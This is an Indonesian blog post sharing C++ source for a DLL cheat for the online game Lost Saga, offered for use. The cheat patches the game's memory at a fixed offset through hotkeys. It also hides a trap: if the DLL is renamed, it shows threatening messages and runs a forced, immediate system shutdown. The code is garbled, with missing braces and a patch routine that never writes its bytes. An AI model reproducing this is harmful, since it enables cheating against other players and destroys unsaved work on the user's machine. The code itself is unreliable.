Sabtu, 29 September 2012

New Base LS Indonesia | 30 sept 2012

Spesial Thanks to
[-] Satria Mailian Gumelar
[-] Aray van Jakster
[-] Dimas Syahputra

[-] Brutal
//Name : Ryan Pebriansyah
//Created : Ryanltszh (Me)
//Thanks : Allah Swt
//Notice : Jgn di sebar pliss buatny susah

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

//============ OFFSET ============
#define Brutal 0xB26014   //Cari Pke AOB
//============ ------ ============

LPTSTR ModulGame = "lostsaga.exe"; //Targetnya

void Patch(void *adr, void *ptr, int size)


DWORD OldProtection;
VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection);
VirtualProtect(adr,size,OldProtection, &OldProtection);
void WritePointer(unsigned long ulBase, int iOffset, int iValue)
if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long)))
if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long)))
*(int*)(*(unsigned long*)ulBase + iOffset) = iValue;
void SagaBlog()

//========== Brutal ==========//
if (GetAsyncKeyState(VK_F1)&1) { // On
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)Brutal;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x43\x53\x5F\x48\x41\x53\x5F\x55\x53\x49\x4E\x47\x5F\x53\x4B\x49\x4C\x4C", 18); // Base Code

if (GetAsyncKeyState(VK_F2)&1) { // Off
DWORD adrMin1, adrMin2 = 0;
DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe");
if (dwPB > 0) {
adrMin1 = dwPB + (DWORD)Brutal;
Patch((void *)(adrMin1),(void*)(PBYTE)"\x43\x53\x5F\x55\x53\x49\x4E\x47\x5F\x53\x4B\x49\x4C", 13); // Base Code

Sleep(108); // Perintah jeda

BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved)


if(callReason == DLL_PROCESS_ATTACH) {

MessageBox(0, "Created by Ryanltszh  \nGreeting From F2F\nThanks all people who help me", "||==== Ryanltszh ====||",MB_ICONINFORMATION | MB_OK); // Notice 1
MessageBox (0,"Created by Ryanltszh\n\nFeature : \n~ Brutal\n\nBlog :\nForum :","|| == Ryanltszh == ||", MB_OKCANCEL + MB_ICONINFORMATION);
MessageBox(0, "Hotkeys :\n[-_-] Brutal : F1 = ON | F2 = OFF\n\nTekan on pada saat Menyambung UDP dan offkan saat Loading penuh penuh ", "||==== F2F = FaceInteraction ====||",MB_ICONINFORMATION | MB_OK); // Notice 2

CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaBlog,0, 0, 0);

char strDLLName [_MAX_PATH];

GetModuleFileName(hDll, strDLLName , _MAX_PATH);

//-================= Edit sendiri agar tidak di Rename =========================-//
if (strstr(strDLLName, "Ryanltszh.dll") <= 0) {//Nama DLL Asli
MessageBox(0, "File Di Rename","Error!!!!!!!!!",MB_ICONSTOP | MB_OK); // tampilkan pesan, kalo dll nya sdh di rename
MessageBox(0, "Ente Mo apain ni file","Error!!!!!!!!!",MB_ICONSTOP | MB_OK);
MessageBox(0, "Bye Computer anda w kasih virus !\nShutdown the computer","Error!!!!!!!!!",MB_ICONSTOP | MB_OK);
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");




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